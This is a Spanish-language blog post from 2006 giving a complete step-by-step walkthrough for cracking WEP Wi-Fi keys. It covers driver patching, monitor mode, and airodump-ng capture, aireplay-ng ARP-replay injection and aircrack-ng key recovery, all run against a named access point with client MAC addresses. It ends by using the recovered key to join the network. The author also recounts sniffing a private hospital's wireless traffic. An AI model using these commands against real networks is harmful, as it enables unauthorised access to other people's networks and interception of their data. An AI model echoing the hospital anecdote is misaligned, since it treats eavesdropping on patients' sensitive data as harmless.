2006-10-16

C r a c k Wifi WEP - WPA. Completo y detalle.

DETALLE COMPLETO, LAAAAAAARGOOOOO

He leido cientos de articulos sobre como crackear WEP en wifi, pero ninguno me gustaba, porque no incluían el detalle completo de TODO el proceso, muchos hablaban de una parte, de otra, de tal método, de que hay que recompilar el p*** Kernel....

Así que por el pedido de un amigo lo junté todo, en un doc, pero además lo fui haciendo paso a paso, asi que todo esto está probado, lo hice yo mismo, no me lo contó nadie, hasta que logre crackear el AP con WEP que usamos como modelo.

No quiero que me escriban diciendo "quiero usar el adsl de mi vecino", "quiero ser hacker" o cosas similares, mejor, leer y no me escriban.





En el 2000 (aprox) usando unas placas Orinoco nos dedicamos con un amigo a mirar el tráfico de un Hospital Privado en Capital Federal (uno de los mejores en el pais decían...), uno de esos Hospitales Caros para nacimientos... no voy a decir nada mas.

Esa gente tenia un enlace wifi y muchos de sus datos viajaban por ahi. Realmente nunca hicimos nada con eso, solo mirar, despues de todo no somos malos. no ?

Para eso usamos una portátil, una placa wifi de las primeras (gold) y Linux.

Hace un mes me pidieron algo similar, asi que manos a la obra, las cosas no cambiaron mucho en este tiempo. Y tampoco sigue habiendo una guia completa como para todos...

Lamento decirlo, pero Linux es muy bonito PERO "muy crudo/duro", parte de los problemas de su crecimiento es que, "todavía es para chicos ultra hi-tech" que quieran perder horas, ganar disgustos y tener problemas nuevos. (mi pensamiento)

Pero bueno, somos fashion y tenemos que hacerlo.....

PASOS
PREPARACION


* Portatil con Pcmcia, mas de 256 megas ram, cpu de 1 ghz o mas, placa de red y acceso a internet. Placa DLINK DWL650 (que buena...)
* Instalar un Debian 3.1, kernel 2.4.18-bf2 con lo mínimo, aprox 400 megas.
* Actualizarlo (apt-get update, apt-get upgrade)
* Pasarlo a Unstable (vi /etc/apt/sources)
* Volverlo a actualizar.
* Bajar fuentes (yo use el kernel-source-2.4.27) bajar los headers, bajar los pcmcia.
* Bajar nmap, tcpdump, kismet, aircrack, aptitude, pcmcia-cs, gcc, cpp, ethereal, host-ap sources, hostap-utils, tethereal, ssh server, gnupg y lynx.
* Tambien puse Festival (para escuchar voces...)
* Tambien se instalan otros productos, pero pocos.
* Espacio ocupado, unos 500 megas (aprox).

ACCIONES

* Recompilar el kernel... uffff que tema... para muchisimas cosas caemos en esto. Una mier...... En fin. Tampoco es para tanto.
* Descompactar el fichero kern-sour.tar.gz (crea un hernel-source-2.4.27)
* Crean a link Linux, ln -s /usr/src/linux* linux, para facilitar algo.
* Luego en Linux.
make mrproper
make menuconfig (leer el fichero de configuracion del 2.4.18-bf2)
(suele estar en /boot/config o similar) hacer una copia de ese config por las dudas
make dep
make
make modules
make modules_install
make install

EN CASO DE ALGUN TIPO DE ERROR, parar y avisar.

* Tocar lilo si hace falta, no fue mi caso.
* Bajar las fuentes del hostap.
* Meterlo en /usr/src/hostap
* Reboot del equipo ahora usando el nuevo kernel. (2.4.27-3)
* Ir a /usr/src/hostap_source
* make; make install

EN CASO DE ALGUN TIPO DE ERROR, parar y avisar.

* probar hacer un
insmod hostap; insmod hostap_cs
* luego
lsmod
para ver que esten cargados esos modulos

* Bajar el aircrack-ng, y patches varios (FUNDAMENTAL)

http://hwagm.elhacker.net/drivers-ng/driver-ng.htm


ifconfig wlan0 down
ifconfig wlan0 promisc
iwconfig wlan0 mode monitor

wget http://hostap.epitest.fi/releases/hostap-driver-0.4.9.tar.gz
tar -xvzf hostap-driver-0.4.9.tar.gz
cd hostap-driver-0.4.9
wget http://patches.aircrack-ng.org/hostap-driver-0.4.7.patch
patch -Np1 -i hostap-driver-0.4.7.patch
make && make install

* eto no estaba
mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~

* no hace falta, mejor reinicio
/etc/init.d/pcmcia start

* CS para PCMCIA
modprobe hostap_cs &>/dev/null




* REBOOT y ver que todo cargue normalmente,
* Espacio ocupado aprox 1 gb


AHORA EL CRACK

* editar el /etc/kismet/kismet.conf (hostap,wlan0,Prism2)

* Correr Kismet, ver red y detectar el AP ( CISCO 00:40:96:a2:79:EE ch.9)

* ifconfig -a , para ver todas las placas, debe aparecer wlan0 y wifi0

* iwconfig wlan0 mode monitor (para activar monitor RF)

* ifconfig wlan0 promisc

* ifconfig wlan0 (para ver caracteristicas de la placa dlink)

* NO Dejar corriendo KISMET

* En otra ventana

airodump-ng --channel 9 -b CISCO wlan0 -w temp1

ver clientes conectados al AP, obtener MAC del AP y de algun cliente
00:c0:49:f6:37:3d
00:15:00:36:54:6f
00:11:0A:80:F5:88
00:0F:20:93:C1:55
00:14:C2:51:77:F1

* EN OTRA VENTANA

aireplay-ng -3 -g 180 -r temp1-01.cap -b 00:40:96:A2:79:EE -h 00:C0:49:F6:37:3D wlan0
Esto inyectará paquetes para el AP desde un cliente.
Si el texto "GOT nnnn ARP Request" no aumenta rapidametne, es que algo va mal.


* EN OTRA VENTANA

aircrack-ng -a 1 replay_arp-1016-173322.cap
Esto intentará obtener el código WEP (esto es realmente el CRACK)



* PRUEBA DE QUE EL CRACK ES CORRECTO

iwconfig wlan0 mode Managed key 22:05:19:79:30:03:19:76:17:03:19:82:27 essid CISCO
Asociarse al AP, poniendo el KEY. Quizás luego hacer un dhclient para obtener IP, luego ping a www.google.es y deberia funcionar.




INFO IMPORTANTE

http://www.tuto-fr.com/en/tutorial/tutorial-crack-wep-aircrack.php

VIDEO
http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/videos/video-crack-wep-devine.php


KISMET
Q: Why am I not seeing all the traffic on a network?
A: You're most likely channel hopping. You can't see all the traffic on
a channel if you're hopping, just like you can't see all of a show on
TV if you're channel surfing. If you need to see all of the data from
a single network, you'll need to disable hopping or lock Kismet onto the
network you want to watch.

channelhop = TRUE / FALSE

Pantallas










No hay comentarios:

Por el mundo